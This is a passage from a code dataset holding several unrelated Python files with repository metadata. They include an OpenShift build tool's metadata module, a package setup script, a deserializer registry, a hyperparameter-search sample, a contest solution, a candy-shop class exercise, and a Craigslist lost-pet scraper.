self.runtime.pooled_koji_client_session() as koji_api:\n # latest builds of this component in all candidate Brew tags (e.g. 
[rhaos-4.7-rhel-8-candidate, rhaos-4.7-rhel-7-candidate])\n build_lists = brew.get_latest_builds([(tag, component_name) for tag in candidate_tags], None, None, koji_api)\n latest_builds = [builds[0] if builds else None for builds in build_lists]\n tags_without_builds = {tag for tag, _ in filter(lambda tag_build: tag_build[1] is None, zip(candidate_tags, latest_builds))}\n if tags_without_builds:\n return True, f'Component {component_name} has never been built against {tags_without_builds}'\n\n # latest_build is the eldest among those latest builds for different targets\n latest_build = min(latest_builds, key=lambda build: build['creation_event_id'])\n latest_build_creation_event_id = latest_build['creation_event_id']\n # getEvent returns something like {'id': 31825801, 'ts': 1591039601.2667}\n latest_build_creation_ts_seconds = int(koji_api.getEvent(latest_build_creation_event_id)['ts'])\n # Log scan-sources coordinates throughout to simplify setting up scan-sources\n # function tests to reproduce real-life scenarios.\n self.logger.debug(f'scan-sources coordinate: latest_build: {latest_build}')\n self.logger.debug(f'scan-sources coordinate: latest_build_creation_ts_seconds: {latest_build_creation_ts_seconds}')\n\n dgr = self.distgit_repo()\n with Dir(dgr.distgit_dir):\n dg_commit, _ = exectools.cmd_assert('git rev-parse HEAD', strip=True)\n self.logger.debug(f'scan-sources coordinate: dg_commit: {dg_commit}')\n ts, _ = exectools.cmd_assert('git show -s --format=%ct HEAD', strip=True)\n distgit_head_commit_ts_seconds = int(ts)\n self.logger.debug(f'scan-sources coordinate: distgit_head_commit_ts_seconds: {distgit_head_commit_ts_seconds}')\n\n one_hour = (1 * 60 * 60) # in seconds\n\n if not dgr.has_source():\n if distgit_head_commit_ts_seconds > latest_build_creation_ts_seconds:\n # Two options:\n # 1. A user has made a commit to this dist-git only branch and there has been no build attempt\n # 2. 
We've already tried a build and the build failed.\n # To balance these two options, if the diff > 1 hour, request a build.\n if (distgit_head_commit_ts_seconds - latest_build_creation_ts_seconds) > one_hour:\n return True, 'Distgit only repo commit is at least one hour older than most recent build'\n return False, 'Distgit only repo commit is older than most recent build'\n\n # We have source.\n with Dir(dgr.source_path()):\n upstream_commit_hash, _ = exectools.cmd_assert('git rev-parse HEAD', strip=True)\n self.logger.debug(f'scan-sources coordinate: upstream_commit_hash: {upstream_commit_hash}')\n\n dgr_path = pathlib.Path(dgr.distgit_dir)\n if self.namespace == 'containers' or self.namespace == 'apbs':\n dockerfile_path = dgr_path.joinpath('Dockerfile')\n if not dockerfile_path.is_file():\n return True, 'Distgit dockerfile not found -- appears that no rebase has ever been performed'\n dfp = DockerfileParser(str(dockerfile_path))\n last_distgit_rebase_upstream_hash = dfp.envs.get('SOURCE_GIT_COMMIT', None)\n self.logger.debug(f'scan-sources coordinate: last_distgit_rebase_upstream_hash: {last_distgit_rebase_upstream_hash}')\n if last_distgit_rebase_upstream_hash != upstream_commit_hash:\n return True, f'Distgit contains SOURCE_GIT_COMMIT hash {last_distgit_rebase_upstream_hash} different from upstream HEAD {upstream_commit_hash}'\n elif self.namespace == 'rpms':\n specs = list(dgr_path.glob('*.spec'))\n if not specs:\n return True, 'Distgit .spec file not found -- appears that no rebase has ever been performed'\n with specs[0].open(mode='r', encoding='utf-8') as spec_handle:\n spec_content = spec_handle.read()\n if upstream_commit_hash not in spec_content:\n return True, f'Distgit spec file does not contain upstream hash {upstream_commit_hash}'\n else:\n raise IOError(f'Unknown namespace type: {self.namespace}')\n\n if distgit_head_commit_ts_seconds > latest_build_creation_ts_seconds:\n # Distgit is ahead of the latest build.\n # We've likely made an attempt to rebase and the subsequent build failed.\n # Try again if we are at least 6 hours out from the build to avoid\n # pestering image owners will repeated build failures.\n if distgit_head_commit_ts_seconds - latest_build_creation_ts_seconds > (6 * one_hour):\n return True, 'It has been 6 hours since last failed build attempt'\n return False, f'Distgit commit ts {distgit_head_commit_ts_seconds} ahead of last successful build ts {latest_build_creation_ts_seconds}, but holding off for at least 6 hours before rebuild'\n else:\n # The latest build is newer than the latest distgit commit. No change required.\n return False, 'Latest build is newer than latest upstream/distgit commit -- no build required'\n\n def get_maintainer_info(self):\n \"\"\"\n :return: Returns a dict of identifying maintainer information. Dict might be empty if no maintainer information is available.\n fields are generally [ component: '...', subcomponent: '...', and product: '...' ] if available. These\n are coordinates for product security to figure out where to file bugs when an image or RPM has an issue.\n \"\"\"\n\n # We are trying to discover some team information that indicates which BZ or Jira board bugs for this\n # component should be filed against. This information can be stored in the doozer metadata OR\n # in upstream source. 
Metadata overrides, as usual.\n\n source_dir = self.runtime.resolve_source(self)\n\n # Maintainer info can be defined in metadata, so try there first.\n maintainer = self.config.maintainer or dict()\n\n # This tuple will also define key ordering in the returned OrderedDict\n known_fields = ('product', 'component', 'subcomponent')\n\n # Fill in any missing attributes from upstream source\n if source_dir:\n with Dir(source_dir):\n # Not every repo has a master branch, they may have a different default; detect it.\n if self.public_upstream_url:\n # If there is a public upstream, query it for the default branch. The openshift-priv\n # clones seem to be non-deterministic on which branch is set as default.\n remote_info, _ = exectools.cmd_assert('git remote show public_upstream')\n else:\n remote_info, _ = exectools.cmd_assert('git remote show origin')\n head_branch_lines = [i for i in remote_info.splitlines() if i.strip().startswith('HEAD branch:')] # e.g. [ \" HEAD branch: master\" ]\n if not head_branch_lines:\n raise IOError('Error trying to detect remote default branch')\n default_branch = head_branch_lines[0].strip().split()[-1] # [ \" HEAD branch: master\" ] => \"master\"\n\n _, owners_yaml, _ = exectools.cmd_gather(f'git --no-pager show origin/{default_branch}:OWNERS')\n if owners_yaml.strip():\n owners = yaml.safe_load(owners_yaml)\n for field in known_fields:\n if field not in maintainer and field in owners:\n maintainer[field] = owners[field]\n\n if 'product' not in maintainer:\n maintainer['product'] = 'OpenShift Container Platform' # Safe bet - we are ART.\n\n # Just so we return things in a defined order (avoiding unnecessary changes in git commits)\n sorted_maintainer = OrderedDict()\n for k in known_fields:\n if k in maintainer:\n sorted_maintainer[k] = maintainer[k]\n\n # Add anything remaining in alpha order\n for k in sorted(maintainer.keys()):\n if k not in sorted_maintainer:\n sorted_maintainer[k] = maintainer[k]\n\n return sorted_maintainer\n\n def extract_kube_env_vars(self) -> Dict[str, str]:\n \"\"\"\n Analyzes the source_base_dir for either Godeps or go.mod and looks for information about\n which version of Kubernetes is being utilized by the repository. Side effect is cloning distgit\n and upstream source if it has not already been done.\n :return: A Dict of environment variables that should be added to the Dockerfile / rpm spec.\n Variables like KUBE_GIT_VERSION, KUBE_GIT_COMMIT, KUBE_GIT_MINOR, ...\n May be empty if there is no kube information in the source dir.\n \"\"\"\n envs = dict()\n\n upstream_source_path: pathlib.Path = self.runtime.resolve_source(self)\n if not upstream_source_path:\n # distgit only. Return empty.\n return envs\n\n kube_version_fields: List[str] = None # Populate ['x', 'y', 'z'] this from godeps or gomod\n kube_commit_hash: str = None # Populate with kube repo hash like '2f054b7646dc9e98f6dea458d2fb65e1d2c1f731'\n with Dir(upstream_source_path):\n out, _ = exectools.cmd_assert([\"git\", \"rev-parse\", \"HEAD\"])\n source_full_sha = out.strip()\n\n # First determine if this source repository is using Godeps. 
Godeps is ultimately\n # being replaced by gomod, but older versions of OpenShift continue to use it.\n godeps_file = pathlib.Path(upstream_source_path, 'Godeps', 'Godeps.json')\n if godeps_file.is_file():\n try:\n with godeps_file.open('r', encoding='utf-8') as f:\n godeps = json.load(f)\n # Reproduce https://github.com/openshift/origin/blob/6f457bc317f8ca8e514270714db6597ec1cb516c/hack/lib/build/version.sh#L82\n # Example of what we are after: https://github.com/openshift/origin/blob/6f457bc317f8ca8e514270714db6597ec1cb516c/Godeps/Godeps.json#L10-L15\n for dep in godeps.get('Deps', []):\n if dep.get('ImportPath', '') == 'k8s.io/kubernetes/pkg/api':\n kube_commit_hash = dep.get('Rev', '')\n raw_kube_version = dep.get('Comment', '') # e.g. v1.14.6-152-g117ba1f\n # drop release information.\n base_kube_version = raw_kube_version.split('-')[0] # v1.17.1-152-g117ba1f => v1.17.1\n kube_version_fields = base_kube_version.lstrip('v').split('.') # v1.17.1 => [ '1', '17', '1']\n except:\n self.logger.error(f'Error parsing godeps {str(godeps_file)}')\n traceback.print_exc()\n\n go_sum_file = pathlib.Path(upstream_source_path, 'go.sum')\n if go_sum_file.is_file():\n try:\n # we are looking for a line like: https://github.com/openshift/kubernetes/blob/5241b27b8acd73cdc99a0cac281645189189f1d8/go.sum#L602\n # e.g. \"k8s.io/kubernetes v1.19.0-rc.2/go.mod h1:zomfQQTZYrQjnakeJi8fHqMNyrDTT6F/MuLaeBHI9Xk=\"\n with go_sum_file.open('r', encoding='utf-8') as f:\n for line in f.readlines():\n if line.startswith('k8s.io/kubernetes '):\n entry_split = line.split() # => ['k8s.io/kubernetes', 'v1.19.0-rc.2/go.mod', 'h1:zomfQQTZYrQjnakeJi8fHqMNyrDTT6F/MuLaeBHI9Xk=']\n base_kube_version = entry_split[1].split('/')[0].strip() # 'v1.19.0-rc.2/go.mod' => 'v1.19.0-rc.2'\n kube_version_fields = base_kube_version.lstrip('v').split('.') # 'v1.19.0-rc.2' => [ '1', '19', '0-rc.2']\n # upstream kubernetes creates a tag for each version. Go find its sha.\n rc, out, err = exectools.cmd_gather(f'git ls-remote https://github.com/kubernetes/kubernetes {base_kube_version}')\n out = out.strip()\n if out:\n # Expecting something like 'a26dc584ac121d68a8684741bce0bcba4e2f2957\trefs/tags/v1.19.0-rc.2'\n kube_commit_hash = out.split()[0]\n else:\n # That's strange, but let's not kill the build for it. Poke in our repo's hash.\n kube_commit_hash = source_full_sha\n break\n except:\n self.logger.error(f'Error parsing go.sum {str(go_sum_file)}')\n traceback.print_exc()\n\n if kube_version_fields:\n # For historical consistency with tito's flow, we add +OS_GIT_COMMIT[:7] to the kube version\n envs['KUBE_GIT_VERSION'] = f\"v{'.'.join(kube_version_fields)}+{source_full_sha[:7]}\"\n envs['KUBE_GIT_MAJOR'] = '0' if len(kube_version_fields) < 1 else kube_version_fields[0]\n godep_kube_minor = '0' if len(kube_version_fields) < 2 else kube_version_fields[1]\n envs['KUBE_GIT_MINOR'] = f'{godep_kube_minor}+' # For historical reasons, append a '+' since OCP patches its vendored kube.\n envs['KUBE_GIT_COMMIT'] = kube_commit_hash\n envs['KUBE_GIT_TREE_STATE'] = 'clean'\n elif self.name in ('openshift-enterprise-hyperkube', 'openshift', 'atomic-openshift'):\n self.logger.critical(f'Unable to acquire KUBE vars for {self.name}. 
This must be fixed or platform addons can break: https://bugzilla.redhat.com/show_bug.cgi?id=1861097')\n raise IOError(f'Unable to determine KUBE vars for {self.name}')\n\n return envs\n","repo_name":"Global19-atlassian-net/doozer","sub_path":"doozerlib/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":23203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"34603509799","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport os\nimport re\nimport sys\n\nfrom setuptools import setup\n\n\ndef read(*paths):\n \"\"\"\n Build a file path from paths and return the contents.\n \"\"\"\n with open(os.path.join(*paths), 'r') as f:\n return f.read()\n\n\ndef get_version(package):\n \"\"\"\n Return package version as listed in `__version__` in `init.py`.\n \"\"\"\n init_py = open(os.path.join(package, '__init__.py')).read()\n return re.search(\"__version__ = ['\\\"]([^'\\\"]+)['\\\"]\", init_py).group(1)\n\n\ndef get_packages(package):\n \"\"\"\n Return root package and all sub-packages.\n \"\"\"\n return [dirpath\n for dirpath, dirnames, filenames in os.walk(package)\n if os.path.exists(os.path.join(dirpath, '__init__.py'))]\n\n\ndef get_package_data(package):\n \"\"\"\n Return all files under the root package, that are not in a\n package themselves.\n \"\"\"\n walk = [(dirpath.replace(package + os.sep, '', 1), filenames)\n for dirpath, dirnames, filenames in os.walk(package)\n if not os.path.exists(os.path.join(dirpath, '__init__.py'))]\n\n filepaths = []\n for base, filenames in walk:\n filepaths.extend([os.path.join(base, filename)\n for filename in filenames])\n return {package: filepaths}\n\n\nif sys.argv[-1] == 'publish':\n os.system(\"python3 setup.py sdist bdist_wheel\")\n os.system(\"twine check dist/*\")\n os.system(\"twine upload dist/*\")\n print(\"You probably want to also tag the version now:\")\n print(\" git tag -a {0} -m 'version {0}'\".format(\n get_version('rest_framework_app_api')))\n print(\" git push --tags\")\n sys.exit()\n\nsetup(\n name='djangorestframework-appapi',\n version=get_version('rest_framework_app_api'),\n url='https://github.com/allran/djangorestframework-appapi',\n license='BSD',\n description='A Django REST framework API adapter for the App(IOS, Andorid, WebApp) API spec.',\n long_description=read('README.rst'),\n long_description_content_type='text/x-rst',\n author='Allran.Qu',\n author_email='',\n packages=get_packages('rest_framework_app_api'),\n package_data=get_package_data('rest_framework_app_api'),\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Software Development :: Libraries :: Application Frameworks',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n install_requires=[\n 'djangorestframework>=3.10',\n 'django>=1.11',\n ],\n extras_require={\n\n },\n python_requires=\">=3.5\",\n 
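# Install unzipped (zip_safe=False) so the package_data files collected above can presumably be read directly from disk.\n 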
zip_safe=False,\n)\n","repo_name":"allran/djangorestframework-appapi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"7784217867","text":"from enum import Enum\nimport typing\n\nfrom pydantic import BaseModel\nfrom .base_deserialzier import BaseDeserializer\nfrom .primitive_deserialzier import PrimitiveDeserializer, NoneDeserializer\nfrom .enum_deserializer import EnumDeserializer\nfrom .object_deserializer import ObjectDeserializer\n\n\nDefaultDeserializerLUT: typing.Dict[\n typing.Union[typing.Literal[\"None\"], typing.Type[typing.Any]],\n BaseDeserializer[typing.Any],\n] = {\n \"None\": NoneDeserializer(),\n str: PrimitiveDeserializer(lambda x: x.as_str(inner=False), \"Expected str\", rank=1),\n bool: PrimitiveDeserializer(lambda x: x.as_bool(), \"Expected bool\", rank=2),\n int: PrimitiveDeserializer(lambda x: x.as_int(), \"Expected int\", rank=3),\n float: PrimitiveDeserializer(lambda x: x.as_float(), \"Expected float\", rank=4),\n}\n\nGeneratedDeserializerLUT: typing.Dict[str, BaseDeserializer[typing.Any]] = {}\n\nENM = typing.TypeVar(\"ENM\", bound=Enum)\n\n\nT = typing.TypeVar(\"T\", bound=typing.Union[BaseModel, Enum])\n\n\ndef register_deserializer(\n aliases: typing.Dict[str, str] = {},\n) -> typing.Callable[[typing.Type[T]], typing.Type[T]]:\n \"\"\"\n Decorator to register a new deserializer.\n\n Args:\n aliases (Dict[str, str], optional): The alias to enum mapping. Defaults to {}.\n alias_to_field (Dict[str, str], optional): The alias to field mapping. Defaults to {}.\n\n Raises:\n AssertionError: If the type is already registered.\n \"\"\"\n\n def decorator(cls: typing.Type[T]) -> typing.Type[T]:\n global GeneratedDeserializerLUT\n assert (\n cls.__name__ not in GeneratedDeserializerLUT\n ), f\"Cannot register {cls.__name__} twice.\"\n if issubclass(cls, Enum):\n GeneratedDeserializerLUT[cls.__name__] = EnumDeserializer(\n enm=cls, aliases=aliases\n )\n else:\n assert issubclass(\n cls, BaseModel\n ), f\"Cannot register {cls.__name__}. 
Must be a subclass of BaseModel.\"\n GeneratedDeserializerLUT[cls.__name__] = ObjectDeserializer(\n model=cls,\n alias_to_field=aliases,\n )\n return cls\n\n return decorator\n\n\n__all__ = [\n \"register_deserializer\",\n]\n","repo_name":"GlooHQ/baml","sub_path":"clients/python/baml_lib/_impl/deserializer/exports.py","file_name":"exports.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73233741530","text":"import hpopt\nimport numpy as np\nfrom multiprocessing import Process\nimport time\n\ndef my_model(step, width, height):\n return (0.1 + width * step / 100)**(-1) + height * 0.1\n\n\ndef my_trainer(config):\n # Hyperparameters\n width, height = config['params']['width'], config['params']['height']\n\n for step in range(config[\"iterations\"]):\n # Iterative training function - can be an arbitrary training procedure\n score = my_model(step, width, height)\n # \n if hpopt.report(config=config, score=score) == hpopt.Status.STOP:\n break\n\n\nhp_configs = {\"width\": hpopt.search_space(\"uniform\", [10, 100]),\n \"height\": hpopt.search_space(\"uniform\", [0, 100])}\n\nmy_hpo = hpopt.create(save_path='./tmp/my_hpo_asha',\n search_alg=\"asha\",\n search_space=hp_configs,\n mode='min',\n num_trials=100,\n min_iterations=1,\n max_iterations=100,\n num_brackets=5,\n reduction_factor=3,\n num_full_iterations=50,\n full_dataset_size=2500)\nprint(my_hpo.rungs_in_brackets)\nexit()\nnum_max_workers = 10\nproc_list = []\n\nwhile True:\n num_active_workers = 0\n for p in proc_list:\n if p.is_alive():\n num_active_workers += 1\n else:\n p.close()\n proc_list.remove(p)\n\n while num_active_workers < num_max_workers:\n config = my_hpo.get_next_sample()\n\n if config is None:\n break\n\n p = Process(target=my_trainer, args=(config, ))\n proc_list.append(p)\n p.start()\n num_active_workers += 1\n\n # All trials are done.\n if num_active_workers == 0:\n break\n\nprint(\"best hp: \", my_hpo.get_best_config())\n","repo_name":"openvinotoolkit/hyper_parameter_optimization","sub_path":"samples/asha.py","file_name":"asha.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"21602736926","text":"from heapq import heappop, heappush\n\nN, K = map(int, input().split())\n\nnums = list(map(int, input().split()))\n\ngroups = []\n\nfor i in range(K):\n groups.append([])\n\n# K-stepで配列の生成\n# Kで割った余りが等しいindexを同じグループに入れる\nfor i in range(N + (K - N % K)):\n if len(nums) <= i:\n num = 2 ** 60\n else:\n num = nums[i]\n groups[i % K].append(num)\n\nfor i, nums in enumerate(groups):\n groups[i] = sorted(nums)\n\ncan = True\n\nfor nums in zip(*groups):\n nums = list(nums)\n exp = sorted(nums)\n if exp != nums:\n can = False\n break\n\nprint(\"Yes\" if can else \"No\")\n","repo_name":"lgtm-migrator/algo-practices","sub_path":"atcoder/ABC254/C_new.py","file_name":"C_new.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26587124189","text":"# We run a Candy shop where we sell candies and lollipops\n# One lollipop's price is 10$\n# And it made from 5gr of sugar\n# One candy's price is 20$\n# And it made from 10gr of sugar\n# we can raise their prices with a given percentage\n#\n\n# It can store sugar and money as income. 
The constructor should take the amount of sugar in gramms.\n# we can create lollipops and candies store them in the CandyShop's storage\n# If we create a candy or lollipop the CandyShop's sugar amount gets reduced by the amount needed to create the sweets\n# We can raise the prices of all candies and lollipops with a given percentage\n# We can sell candy or lollipop with a given number as amount\n# If we sell sweets the income will be increased by the price of the sweets and we delete it from the inventory\n# We can buy sugar with a given number as amount. The price of 1000gr sugar is 100$\n# If we buy sugar we can raise the CandyShop's amount of sugar and reduce the income by the price of it.\n# The CandyShop should be represented as string in this format:\n# \"Inventory: 3 candies, 2 lollipops, Income: 100, Sugar: 400gr\"\n\n\n# \"Inventory: 3 candies\n# \"Inventory: {candy_amount} candies\n\n# Income: 100\n# {Income} income\n# Income: {income}\n\n\n# Create a CandyShop class\n\nclass CandyShop(object):\n\n def __init__(self, sugar):\n self.sugar = sugar\n self.candies = 0\n self.lollipops = 0\n self.income = 0\n self.candy_price = 20\n self.lollipop_price = 10\n \n def create_sweets(self, sweet_name):\n if sweet_name == \"candy\":\n if self.sugar >= 10:\n self.sugar -= 10\n self.candies += 1 \n if sweet_name == \"lollipop\":\n if self.sugar >= 5:\n self.sugar -= 5\n self.lollipops += 1 \n \n \n \n def raise_prices(self, percentage):\n price_raise = 1 + percentage/100\n self.candy_price *= price_raise\n self.lollipop_price *= price_raise\n\n \n def sell(self, sweet_name, amount):\n if sweet_name == \"candy\":\n if 0 < amount <= self.candies:\n self.candies -= amount\n self.income += amount * self.candy_price\n if sweet_name == \"lollipop\":\n if 0 < amount <= self.lollipops:\n self.lollipops -= amount\n self.income += amount * self.lollipop_price\n \n def buy_sugar(self, amount):\n sugar_price = amount * 0.1\n if self.income >= sugar_price:\n self.income -= sugar_price\n self.sugar += amount\n \n def __str__(self):\n return \"Inventory: {candy_amount} candies, {lollipop_amount} lollipops, Income: {income}, Sugar: {sugar}gr\".format(\n candy_amount=self.candies,\n lollipop_amount=self.lollipops,\n income=self.income,\n sugar=self.sugar)\n \n \n \n \n\n\ncandy_shop = CandyShop(300)\ncandy_shop.create_sweets(\"candy\")\ncandy_shop.create_sweets(\"candy\")\ncandy_shop.create_sweets(\"lollipop\")\ncandy_shop.create_sweets(\"lollipop\")\nprint(candy_shop)\n# Should print out:\n# Inventory: 2 candies, 2 lollipops, Income: 0, Sugar: 270gr\ncandy_shop.sell(\"candy\", 1)\nprint(candy_shop)\n# Should print out:\n# \"Inventory: 1 candies, 2 lollipops, Income:20, Sugar: 270gr\"\ncandy_shop.raise_prices(5)\ncandy_shop.sell(\"lollipop\", 1)\nprint(candy_shop)\n# Should print out:\n# \"Inventory: 1 candies, 1 lollipops, Income:30.5, Sugar: 270gr\"\ncandy_shop.buy_sugar(300)\nprint(candy_shop)\n# Should print out:\n# \"Inventory: 1 candies, 1 lollipops, Income:5, Sugar: 570gr\"\n\n\n","repo_name":"green-fox-academy/MartonG11","sub_path":"holiday_preparation/candyshop.py","file_name":"candyshop.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1835877356","text":"import pycron\nimport psutil\nimport os\nimport time\nfrom datetime import datetime, timedelta\nimport logging\nimport importlib\nfrom threading import Event\nfrom sysinvest.common.plugin import MonitorPlugin\nfrom sysinvest.common.watchdog 
import ProcessWatchdog\nimport sysinvest.common.api as API\nfrom sysinvest.common.configuration import ConfigLoader\n\n\nclass Monitor( list ):\n def __init__( self, config_class: ConfigLoader ):\n super().__init__()\n self.log = logging.getLogger( 'monitor' )\n self.__p = psutil.Process( os.getpid() )\n self.__event = Event()\n self.__running = False\n self.__passes = 0\n self.__cfgClass = config_class\n self.__cfgIndex = 0\n self.loadModules()\n return\n\n def loadModules( self ):\n self.__cfgIndex += 1\n for obj in self.__cfgClass.Configuration[ 'objects' ]:\n try:\n module = obj[ 'module' ]\n mod = None\n self.log.info( f'Loading monitor: {obj}')\n for mod_path in ( '', 'sysinvest.', 'sysinvest.monitor.' ):\n try:\n mod = importlib.import_module( f'{mod_path}{module}' )\n getattr(mod, 'CLASS_NAME')\n _class = getattr(mod, getattr(mod, 'CLASS_NAME'))\n executor = _class( self, obj )\n if executor not in self:\n self.append( executor )\n\n executor.ConfigIndex = self.__cfgIndex\n executor.ConfigDateTime = datetime.now()\n break\n\n except:\n pass\n\n if mod is None:\n self.log.error( f\"Could not load {obj}\")\n\n except Exception:\n self.log.exception( f\"During module load: {obj}\" )\n\n return\n\n def addToQueue( self, result ):\n self.log.info( f\"Queue add {API.QUEUE.qsize()}\" )\n API.QUEUE.put_nowait( result )\n self.log.info( f\"Queue: {API.QUEUE.qsize()} Done\" )\n return\n\n @property\n def Name( self ):\n return \"ProcessMonitor\"\n\n @property\n def Attributes( self ):\n return {}\n\n def info( self ) -> dict:\n startTime = datetime.fromtimestamp( self.__p.create_time() )\n upTime = datetime.now() - startTime\n return {\n 'since': startTime.strftime( '%Y-%m-%d %H:%M:%S' ),\n 'uptime': f\"{upTime.days} - {str(timedelta( seconds = upTime.seconds ))}\",\n 'passes': self.__passes,\n 'tasks': len( self )\n }\n\n def stop( self ):\n self.__event.set()\n return\n\n def run( self ):\n wd = ProcessWatchdog()\n isStarting = True\n try:\n while not self.__event.is_set():\n wd.trigger()\n self.__passes += 1\n start = int( time.time() )\n for task in self:\n task: MonitorPlugin\n if not task.Enabled:\n continue\n\n if not pycron.is_now( task.Cron ) and not isStarting:\n continue\n\n self.log.info( f\"{task.Name} is being started\" )\n if task.execute():\n task.resetHits()\n\n self.log.info( f\"{task.Name} is finished\" )\n\n isStarting = False\n # Loop time should be about a minute, sleep the remaining time\n sleepTime = 60 - ( int( time.time() ) - start )\n self.log.info( f\"Sleep time: {sleepTime}\" )\n if sleepTime > 0:\n self.__event.wait( sleepTime )\n\n if len( self ) < len( self.__cfgClass.Configuration[ 'objects' ] ):\n # We need to load more modules\n self.loadModules()\n\n except:\n raise\n\n finally:\n # Stop all threaded tasks\n for task in self:\n if hasattr( task, 'stop' ):\n task.stop()\n\n return\n","repo_name":"pe2mbs/sysinvest","sub_path":"sysinvest/common/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70900839132","text":"import scrapy\nfrom scrapy.contrib.spiders import Rule, CrawlSpider\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom items import LostPetItem\nimport datetime\n# from lostpet.items import LostPetItem\n\n\n\n\n#'https://sfbay.craigslist.org/search/laf?query=dog&lost_and_found_type=1'\n\ndef clean_string(list_string):\n concate = \"\"\n for string in list_string:\n concate += 
string.rstrip()\n concate = concate.replace(\"\\n\", \"\", 10)\n return concate\n\n#\n\n\nclass PetSpider(CrawlSpider):\n\n # \"https://sfbay.craigslist.org/search/laf?query=cat&lost_and_found_type=1\"\n\n name = \"lostpets\"\n allowed_domains = [\"sfbay.craigslist.org\"]\n start_urls = [\"https://sfbay.craigslist.org/search/laf?query=dog&lost_and_found_type=1\",\n \"https://sfbay.craigslist.org/search/laf?query=cat&lost_and_found_type=1\"]\n\n # https://sfbay.craigslist.org/eby/laf/d/lost-dog-please-help-reward/6454192457.html\n rules = [\n Rule(SgmlLinkExtractor(allow=[r'.*?/.+?/laf/d/.+/\\d+\\.html']), callback='parse_pet', follow=False)]\n\n def parse_pet(self, response):\n url = response.url\n title = response.xpath('//*[@id=\"titletextonly\"]/text()').extract()[0]\n img = response.xpath('//*[@id=\"thumbs\"]/a/@href').extract()\n description = response.xpath('//*[@id=\"postingbody\"]/text()').extract()\n description = clean_string(description)\n date_list = response.xpath('//*[@id=\"display-date\"]/time/@datetime').extract()\n date = datetime.datetime.strptime(date_list[0], \"%Y-%m-%dT%H:%M:%S-%f\")\n\n mapdata = response.xpath('//*[@id=\"map\"]')\n longitude = None\n latitude = None\n if len(mapdata) != 0:\n longitude = float(mapdata.xpath(\"@data-longitude\").extract()[0])\n latitude = float(mapdata.xpath(\"@data-latitude\").extract()[0])\n\n sidebar = response.xpath('/html/body/section/section/section/div[1]/div/div[2]/text()')\n if len(sidebar) != 0:\n address = response.xpath('/html/body/section/section/section/div[1]/div/div[2]/text()').extract()[0]\n url_google = response.xpath('/html/body/section/section/section/div[1]/div/p/small/a/@href').extract()\n else:\n address = response.xpath('/html/body/section/section/h2/span[2]/small/text()').extract()\n url_google = None\n\n item = LostPetItem(title=title,\n url=url,\n img=img,\n description=description,\n longitude=longitude,\n latitude=latitude,\n address=address,\n date=date,\n url_google=url_google)\n\n yield item\n","repo_name":"Yosolita1978/Lost_Pet_Hackbright","sub_path":"lostpet/lostpet/spiders/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23668242850","text":"class Solution:\n def letterCombinations(self, digits):\n if len(digits) == 0:\n return []\n digit_map = {\n 2: ['a', 'b', 'c'],\n 3: ['d', 'e', 'f'],\n 4: ['g', 'h', 'i'],\n 5: ['j', 'k', 'l'],\n 6: ['m', 'n', 'o'],\n 7: ['p', 'q', 'r', 's'],\n 8: ['t', 'u', 'v'],\n 9: ['w', 'x', 'y', 'z']\n }\n ans = list()\n curr = list()\n self.soln(digits, ans, curr, 0, digit_map)\n\n return ans\n\n def soln(self, digits, ans, curr, index, digit_map):\n if index > len(digits):\n return\n\n if len(curr) == len(digits):\n ans.append(''.join(curr))\n return\n\n if index < len(digits):\n\n alphas = digit_map[int(digits[index])]\n for alpha in alphas:\n curr.append(alpha)\n self.soln(digits, ans, curr, index + 1, digit_map)\n curr.pop()\n\n\ns = Solution()\n\nprint(s.letterCombinations('22'))\n","repo_name":"EashanKaushik/LeetCode","sub_path":"30-Day-Challange/Day-10/phone_combo.py","file_name":"phone_combo.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70681929053","text":"from igraph import *\nimport cairo\nimport Labels\n\ndef displayG(g):\n layout = g.layout(\"kk\")\n plot(g, layout = layout, target=g['name'] + '.png')\n # 
